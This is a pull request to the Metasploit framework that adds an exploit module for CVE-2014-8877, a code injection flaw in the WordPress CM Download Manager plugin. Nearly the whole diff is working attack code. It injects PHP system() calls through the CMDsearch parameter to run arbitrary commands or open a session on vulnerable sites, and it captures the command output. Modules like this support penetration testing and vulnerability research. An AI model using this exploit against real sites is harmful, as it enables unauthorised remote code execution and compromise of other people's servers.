### PR TITLE
Move wp_cm_download_manager_exec to untested folder

### DIFF
--- a/unstable-modules/exploits/untested/wp_cm_download_manager_exec.rb
+++ b/unstable-modules/exploits/untested/wp_cm_download_manager_exec.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+    info,
+    'Name'           => 'Wordpress CM Download Manager Plugin Code Injection',
+    'Description'    => %q{
+      CM Download Manager plugin does not correctly sanitise the user input which allows remote
+      attackers to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/, which
+      is processed by the PHP 'create_function' function. Vulnerability was fixed in version 2.0.4.
+    },
+    'Author'         =>
+      [
+        'Le Ngoc Phi', # initial discovery
+        'mzet' # metasploit module
+      ],
+    'License'        => MSF_LICENSE,
+    'References'     =>
+      [
+        ['CVE', '2014-8877'],
+        ['WPVDB', '7679'],
+        ['URL', 'http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en'],
+      ],
+    'Privileged'     => false,
+    'Payload'        =>
+       {
+         'Compat'      =>
+           {
+             'PayloadType' => 'cmd',
+             'RequiredCmd' => 'generic telnet',
+           }
+       },
+    'Platform'       => ['unix'],
+    'Arch'           => ARCH_CMD,
+    'Targets'        => [['Automatic', {}]],
+    'DefaultTarget'  => 0,
+    'DisclosureDate' => 'Nov 14 2014'))
+
+    register_options(
+      [
+        OptString.new('PERMALINK', [true, "The permalink for downloads", "cmdownloads"])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('cm-dw-manager', '2.0.4')
+  end
+
+  def exploit
+    print_status("#{peer} - Exploiting...")
+
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      exploit_cmd
+    else
+      exploit_session
+    end
+  end
+
+  def exploit_cmd
+    wrapper = rand_text_alpha(10)
+    vuln_url = normalize_uri(datastore['TARGETURI'], 'cmdownloads')
+    p = "\".system(\"echo #{wrapper};#{payload.encoded};echo #{wrapper};\").\""
+
+    res = send_request_cgi({
+      'uri'      => vuln_url,
+      'vars_get' =>
+        {
+          'CMDsearch' => p
+        }
+    })
+
+    if res && res.body && res.body.to_s =~ /#{Regexp.escape(wrapper)}\n(.+?)\n#{Regexp.escape(wrapper)}/m
+      print_status("#{peer} - Command output from the server")
+      print_status($1)
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
+    end
+  end
+
+  def exploit_session
+    vuln_url = normalize_uri(datastore['TARGETURI'], datastore['PERMALINK'])
+    p = "\".system(\"#{payload.encoded}\").\""
+
+    send_request_cgi({
+      'uri'      => vuln_url,
+      'vars_get' =>
+        {
+          'CMDsearch' => p
+        }
+      }, 3)
+  end
+
+end
+


### PR DESCRIPTION
This PR moves https://github.com/rapid7/metasploit-framework/pull/4477 module to unstable, since we need him to help with testing to finish the review process.
